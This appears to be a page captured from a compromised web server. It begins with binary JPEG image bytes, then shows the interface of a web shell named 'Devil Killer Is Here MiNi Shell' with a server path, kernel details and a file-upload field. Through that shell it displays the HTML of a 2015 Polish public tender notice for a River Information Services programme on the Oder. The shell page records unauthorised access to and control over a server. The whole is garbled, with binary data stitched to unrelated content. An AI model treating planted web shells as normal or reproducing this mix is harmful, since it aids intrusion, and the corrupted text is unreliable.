JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150804/198286-N-2015.html

<p class="kh_header"><b>Szczecin: Program Funkcjonalno-Użytkowy dla Pełnego Wdrożenie RIS Granicznego i Dolnego Odcinka Odry</b><br>
<b>Numer ogłoszenia: 198286 - 2015; data zamieszczenia: 04.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Żeglugi Śródlądowej , pl. Batorego 4, 70-207 Szczecin, woj. zachodniopomorskie, tel. 91 43 40 279, 44 03 354, faks 91 43 40 129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.uzs.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Program Funkcjonalno-Użytkowy dla Pełnego Wdrożenie RIS Granicznego i Dolnego Odcinka Odry.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Informacje ogólne 
Przedmiotem zamówienia jest wykonanie usługi pn: Opracowanie Programu Funkcjonalno-Użytkowego Pełnego Wdrożenia RIS Granicznego i Dolnego Odcinka Odry, wchodzącej w skład II etapu budowy systemu informacji rzecznej RIS opracowanego w ramach Programu Operacyjnego Infrastruktura i Środowisko, działanie 7.5 Poprawa stanu śródlądowych dróg wodnych, priorytet VII Transport przyjazny środowisku, perspektywa finansowa  2007-2013. 
W I etapie kompleksowego projektu, w ramach projektu Pilotażowe Wdrożenie RIS Dolnej Odry (projekt współfinansowany z funduszu TEN-T (nr 2010-PL-70206-P) na mocy Decyzji Komisji Europejskiej z dnia 10.12.2012 r. nr C(2012)9020) wdrożono system na minimalnym, wymaganym przez Dyrektywę 2005/44/WE Parlamentu Europejskiego poziomie. 
1.1.	Etap I podzielony został na 3 zadania:
1.1.1.	Opracowanie studium wykonalności oraz programu funkcjonalno-użytkowego pilotażowego wdrożenia RIS Dolnej Odry;
1.1.2.	Pilotażowe wdrożenie RIS Dolnej Odry - w tym budowa Centrum RIS;
1.1.3.	Weryfikacja realizacji pilotażu RIS Dolnej Odry.
1.2.	W II etapie realizacji kompleksowego projektu zostały zidentyfikowane następujące zadania i  dokumenty do opracowania niezbędne do dalszej rozbudowy systemu RIS:
Dotychczas zrealizowane: 
1.2.1.	Opracowanie koncepcji architektonicznej budynku Centrum RIS (Załącznik nr 1 do Opisu Przedmiotu Zamówienia na usługę pn. Program Funkcjonalno-Użytkowy Pełnego Wdrożenia RIS granicznego i dolnego odcinka Odry) 
1.2.2.	Opracowanie Studium Wykonalności Pełnego Wdrożenia RIS Granicznego i Dolnego Odcinka Odry. (Załącznik nr 2 do Opisu Przedmiotu Zamówienia na usługę pn. Program Funkcjonalno-Użytkowy Pełnego Wdrożenia RIS granicznego i dolnego odcinka Odry) 
Pozostałe do realizacji: 
1.2.3.	Opracowanie Programu Funkcjonalno-Użytkowego Pełnego Wdrożenia RIS Granicznego i Dolnego Odcinka Odry;
1.2.4.	Opracowanie, weryfikacja i rozliczenie dokumentacji technicznej II etapu.
Wyniki tych prac zostaną wykorzystane do realizacji projektu Pełnego Wdrożenia RIS Granicznego i Dolnego Odcinka Odry, w  perspektywie finansowej UE 2014-2020. Projekt pełnego wdrożenia RIS został wpisany na listę projektów śródlądowego transportu wodnego w Dokumencie Implementacyjnym do Strategii Rozwoju Transportu do 2020r. (z perspektywą do 2030r. ) (wersja z grudnia 2013r. - 6 miejsce wartość projektu 20 mln złotych).  Rozpoczęcie III etapu wyznaczono  na koniec IV kwartału 2015 roku natomiast  zakończenie  i rozliczenie całego etapu zaplanowano na II kwartał 2019 roku.
2.	Wykonanie Programu Funkcjonalno-Użytkowego 
Program Funkcjonalno-Użytkowy (PFU) wykonany zostanie dla Pełnego Wdrożenia RIS Granicznego i Dolnego Odcinka Odry (dla uproszczenia w dalszej części dokumentu nazywanym Pełnym Wdrożeniem RIS) w trzech wariantach analogicznie do przekazanego Studium Wykonalności (o którym mowa w punkcie XIV.1.2.2), który będzie w sposób satysfakcjonujący i w podstawowym zakresie zaspokajał wymagania Dyrektywy 2005/44/WE w sprawie zharmonizowanych usług informacji rzecznej (RIS) na śródlądowych drogach wodnych we Wspólnocie:
2.1.	Program funkcjonalno-użytkowy Pełnego Wdrożenia RIS wykonany zostanie zgodnie z przepisami rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych, wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz. 2072 z późn. zm.) i będzie stanowił podstawowy dokument realizacji przedsięwzięcia w zakresie:
2.1.1.	Dokumentu niezbędnego do przygotowania i przeprowadzenia postępowania przetargowego na wyłonienie wykonawcy projektu dotyczącego Pełnego Wdrożenia RIS w systemie zaprojektuj i zbuduj, opisującego zakres przedmiotu zamówienia - musi zawierać wszystkie kluczowe informacje niezbędne dla przyszłego wykonawcy projektu w celu prawidłowego oszacowania kosztów i sporządzenia oferty;
2.1.2.	Dokumentu stanowiącego podstawę do przygotowania procesu inwestycyjnego Pełnego Wdrożenia RIS (w tym budowa siedziby Centrum RIS).
2.2.	Jeśli zajdzie konieczności wystąpienia do odpowiedniego organu o wydanie decyzji środowiskowych oraz innych decyzji, zobowiązany do złożenia wniosku o wydanie takiej decyzji jest Wykonawca. W takim wypadku do programu funkcjonalno-użytkowego należy przenieść wszystkie zapisy decyzji dotyczące niniejszego projektu.
2.3.	W zakresie PFU należy przygotować założenia dotyczące dostosowania istniejącej oraz planowanej  infrastruktury do zadań wynikających z rozszerzenia dotychczasowego systemu RIS na obszarze granicznego i dolnego odcinka Odry, a w szczególności propozycję opisu przedmiotu zamówienia (OPZ) dla wymienionych poniżej zadań:
2.3.1.	Opracowanie projektu budowlanego budynku Centrum RIS/Urzędu Żeglugi Śródlądowej w Szczecinie lub projektu przebudowy pomieszczeń biurowych na potrzeby UŻS w Szczecinie;
2.3.2.	Aktualizacja oprogramowania i urządzeń specjalistycznych Centrum RIS w tym środowiska do produkcji elektronicznych komórek Inland ENC do rozszerzonego zakresu wynikającego z Pełnego Wdrożenia RIS - w tym określenie szczegółowego zakresu funkcjonalnego dla wszystkich komponentów oprogramowania RIS, który musi być zachowany przez Generalnego Wykonawcę Pełnego Wdrożenia RIS podczas realizacji projektu, z uwzględnieniem założeń funkcjonalnych przyjętych podczas wdrożenia pilotażowego oraz uwag eksploatacyjnych zgłaszanych przez Operatorów Centrum RIS. Uwagi Operatorów Centrum RIS powinny być zebrane przez Wykonawcę PFU w ramach bezpośredniego wywiadu z pracownikami wskazanymi przez Zamawiającego;
2.3.3.	Rozbudowa/modernizacja infrastruktury serwerowej wraz z siecią transmisji danych pomiędzy serwerownią główną, zapasową i strefami sensorów, oraz centralą telefoniczną;
2.3.4.	Rozbudowa/modernizacja sytemu łączności VHF oraz AIS - wraz z komponentem dystrybucji poprawek DGPS;
2.3.5.	Rozbudowa/modernizacja systemu monitoringu CCTV;
2.3.6.	Wdrożenie technicznego systemu nadzoru obiektów, kontroli dostępu i ochrony mienia dla infrastruktury technicznej RIS;
2.3.7.	Opracowanie raportów oceny odziaływania na środowisko OOŚ - niezbędnych do pozyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia - jeśli zakres realizacji inwestycji wskazuje na taką konieczność;
2.3.8.	Wykaz oraz instrukcje dla pozyskania niezbędnych pozwoleń na budowę lub przebudowę - w przypadku wystąpienia takiej konieczności;
2.3.9.	Opisu przedmiotu zamówienia na realizację usługi Inżyniera Kontraktu dla kompleksowego zadania Pełnego Wdrożenia RIS;
2.4.	Należy w sposób szczegółowy opisać wszystkie wymagane minimalne parametry w stosunku do:
2.4.1.	poszczególnych urządzeń i oprogramowania;
2.4.2.	w stosunku do systemu RIS jako całości.
2.5.	Ponadto dla każdego z wariantów należy opracować szczegółowe wytyczne istotne w fazie realizacji projektu Pełnego Wdrożenia RIS oraz docelowej eksploatacji systemu RIS, w tym:
2.5.1.	Wymagania w odniesieniu do dokumentacji technicznej (rodzaj, zakres, forma) oraz w odniesieniu do procedur prawnych (niezbędne uzgodnienia i decyzje do pozyskania w trakcie wykonywania projektu);
2.5.2.	Wytyczne dla prowadzenia prac budowlanych (przygotowawcze, adaptacyjno-modernizacyjne, budowy nowych obiektów, przyłączy i in.);
2.5.3.	Procedury realizacji dostaw urządzeń z wyszczególnieniem wymogów odnośnie jakości, spełnienia norm technicznych, branżowych i innych;
2.5.4.	Procedury realizacji prac instalacyjnych (warunki dostaw, proces instalacji i integracji systemu);
2.5.5.	Procedury odbioru i testowania obiektów, urządzeń i oprogramowania;
2.5.6.	Procedury pozyskiwania, gromadzenia i przetwarzania informacji batymetrycznych, geodezyjnych oraz danych na temat obiektów istotnych dla prowadzenia nawigacji śródlądowej  w celu utrzymania aktualności zasobów informacji przestrzennej w posiadaniu Centrum RIS; 
2.5.7.	Wymagania w stosunku do gwarancji, serwisu i obsługi technicznej (wymagana dostępność systemu dla poszczególnych elementów, serwisowanie, czas reakcji) - w tym szczegółowe wytyczne dla umowy utrzymaniowej SLA (Service Level Agreement);
2.5.8.	Procedury operacyjne personelu obsługującego system RIS w zakresie rutynowych zadań operatorskich i podstawowego nadzoru serwisowego.
2.6.	W oparciu o wyniki Studium Wykonalności (pkt. 1.2.2) oraz wnioski wynikające z opracowania PFU należy zweryfikować koszty projektu Pełnego Wdrożenia RIS, w rozbiciu na zadania, z wyszczególnieniem:
2.6.1.	kosztów dokumentacji technicznej (w tym pozyskanie niezbędnych zezwoleń, uzgodnień itp.;
2.6.2.	kosztów materiałów, sprzętu, wyposażenia, oprogramowania itp.;
2.6.3.	kosztów prac wdrożeniowych;
2.6.4.	kosztów związanych z utrzymaniem personelu obsługującego system RIS - zarówno dla pracowników Centrum RIS oraz nowych stanowisk operatorskich w Kostrzynie;
2.6.5.	kosztów nadzoru (w tym inżyniera kontaktu);
2.6.6.	kosztów eksploatacji systemu RIS;
2.6.7.	innych kosztów zidentyfikowanych w trakcie przygotowania PFU.
2.7.	Program funkcjonalno-użytkowy powinien uwzględniać najnowsze możliwości techniczne i organizacyjne realizacji zadania dotyczącego rozbudowy RIS Odry oraz dawać gwarancję uzyskania możliwie najlepszych efektów przy jak najniższej kwocie wydatku.
2.8.	Opracowanie musi zawierać szczegółowe wytyczne, ze wskazaniem pełnej listy niezbędnych pozwoleń, uzgodnień i decyzji administracyjnych dla podmiotów działających w imieniu Inwestora na etapie przygotowania oraz realizacji inwestycji.
2.9.	W ramach PFU należy przedstawić propozycję kompleksowej dokumentacji przetargowej na wykonanie Pełnego Wdrożenia RIS.
3.	Sposób realizacji Zamówienia
Poniżej przedstawiono wymagania w zakresie sposobu realizacji Zamówienia:
3.1.	Wykonawca zobowiązuje się do powołania Zespołu Projektowego zdolnego do realizacji Zlecenia.
3.2.	Opracowanie musi zawierać odniesienie do wszystkich punktów wymienionych w sekcji SIWZ XIV.2. 
3.3.	W trackie realizacji Wykonawca potwierdza gotowość do uczestnictwa w spotkaniach roboczych w trakcie których Kierownik Zespołu będzie zdawał relację z postępów prac oraz konsultował z przedstawicielami Zamawiającego szczegóły przygotowywanych opracowań.
3.4.	W razie konieczności, na wniosek lub po konsultacji z Zamawiającym, Wykonawca zapewni możliwość uczestnictwa w spotkaniu wskazanym członkom Zespołu Projektowego lub ekspertom współpracującym z Wykonawcom w zakresie realizacji Zamówienia.
3.5.	Wstępnie zakłada się spotkania robocze w cyklach dwutygodniowych w siedzibie Zamawiającego.
3.6.	 Ewentualne koszty dojazdów i zakwaterowania uczestników spotkań roboczych każda ze stron Umowy pokrywa we własnym zakresie.
3.7.	 Szczegółowy harmonogram spotkań zostanie ustalony z Zamawiającym w dniu podpisania umowy.
3.8.	 W połowie trwania Umowy Wykonawca zobowiązany jest do przekazania i uzyskania akceptacji Zamawiającego dla wersji roboczej opracowania zawierającego proponowany układ dokumentu wraz ze wstępnie opracowaną zawartością dla wszystkich rozdziałów PFU.
3.9.	 Wykonawca zobowiązuje się bez zbędnej zwłoki stosować do zgłaszanych przez Zamawiającego uwag merytorycznych oraz dotyczących stylistyki lub układu wytwarzanych dokumentów  - nie stosowanie się do zastrzeżeń Zamawiającego może skutkować odmową odbioru przedmiotu Zamówienia z zastosowaniem konsekwencji wynikających z nie dochowania terminu realizacji Umowy.
3.10.	Opracowania stanowiące produkt końcowy Zamówienia Wykonawca dostarczy Zamawiającemu w formie drukowanej w liczbie 3 egzemplarzy i w wersji elektronicznej (3 szt.), na nośniku elektronicznym umożliwiającym kopiowanie, muszą być sporządzone w języku polskim, z wyłączeniem streszczenia, które należy przedstawić także w języku angielskim oraz dostarczyć  do siedziby Zamawiającego.
3.11.	Wersje elektroniczne dokumentów muszą być sporządzone zarówno w wersji bez możliwości edycji jak i w wersji umożliwiającej ich edycję. Natomiast wersja elektroniczna programu funkcjonalno- użytkowego ma być dodatkowo przystosowana do umieszczenia materiałów przetargowych na stronie internetowej, zgodnie z treścią zapisów art. 42 ustawy - Prawo zamówień publicznych.
3.12.	Poszczególne dokumenty lub ich części, tworzące odrębną całość, wykonywane w formie drukowanej, powinny mieć formę trwale połączonych ze sobą kart o formacie A4 i trwale włączone do odpowiednich dokumentów.
3.13.	Wszystkie opracowania zostaną opatrzone przez Wykonawcę na przedniej części okładki logo Unii Europejskiej oraz informacją o współfinansowaniu projektu przez Unię Europejską z Funduszu Spójności,  Program Operacyjny Infrastruktura i Środowisko - Narodowa Strategia Spójności - zgodnie z wytycznymi dotyczącymi działań informacyjno-promocyjnych dla projektów POIiŚ. Na płytach powinny zostać nadrukowane lub naklejone analogiczne informacje, jak na przedniej okładce opracowań w wersji papierowej.
3.14.	Na wszelkich publikacjach i opracowaniach należy umieścić oświadczenie informujące o tym, że Unia Europejska nie ponosi odpowiedzialności za treść rozpowszechnianych materiałów zgodnie z informacją umieszczoną w powyżej wymienionych Wytycznych dotyczących działań informacyjno-promocyjnych.

UWAGA - Studium Wykonalności dla Pełnego wdrożenia RIS Dolnej Odry stanowi Załącznik do opisu przedmiotu zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 110.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę, o wartości co najmniej 500 000 zł brutto, polegającą na opracowaniu dokumentacji (studium wykonalności, program funkcjonalno-użytkowy, specjalistyczne ekspertyzy w tym specyfikacje techniczne itp.) związanej z projektowaniem systemów transportu o szacowanej wartości realizacji projektu nie mniejszej niż 10 000 000 zł.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował przy wykonywaniu zamówienia osobą zdolną do kierowania zespołem powołanym przez Wykonawcę do realizacji zamówienia oraz wyznaczoną do bezpośrednich kontaktów z klientem tj. Kierownikiem Zespołu - posiadającym co najmniej dyplom ukończenia studiów wyższych o profilu zarządzanie lub znajomość metodologii zarzadzania projektami potwierdzoną co najmniej przez jedną uznaną organizację certyfikacyjną (na przykład: IPMA, PMI, APMG) oraz doświadczenie polegające na w kierowaniu co najmniej jednym zespołem realizującym projekty  takie jak studium wykonalności, program funkcjonalno-użytkowy, specjalistyczne ekspertyzy w tym specyfikacje techniczne itp., związane z projektowaniem systemów transportu o szacowanej wartości realizacji projektu nie mniejszej niż 10 000 000 zł.     
Zamawiający akceptuje zagraniczne kwalifikacje w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
Ocena spełnienia warunku będzie dokonana na zasadzie spełnia/nie spełnia na podstawie potwierdzających go dokumentów.
Wykonawca jest zobowiązany do skompletowania zespołu autorskiego, którego zakres kompetencji, doświadczenia oraz profil wykształcenia pozwala na realizację przedmiotu Zamówienia. Skład osobowy zespołu powinien zostać podany do wiadomości Zamawiającego zgodnie ze wskazaniem w punkcie SIWZ 3.3). Skład osobowy zespołu, za wyjątkiem Kierownika Zespołu nie stanowi warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od dokonania opisu sposobu oceny spełnienia powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Odpowiednie pełnomocnictwa</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
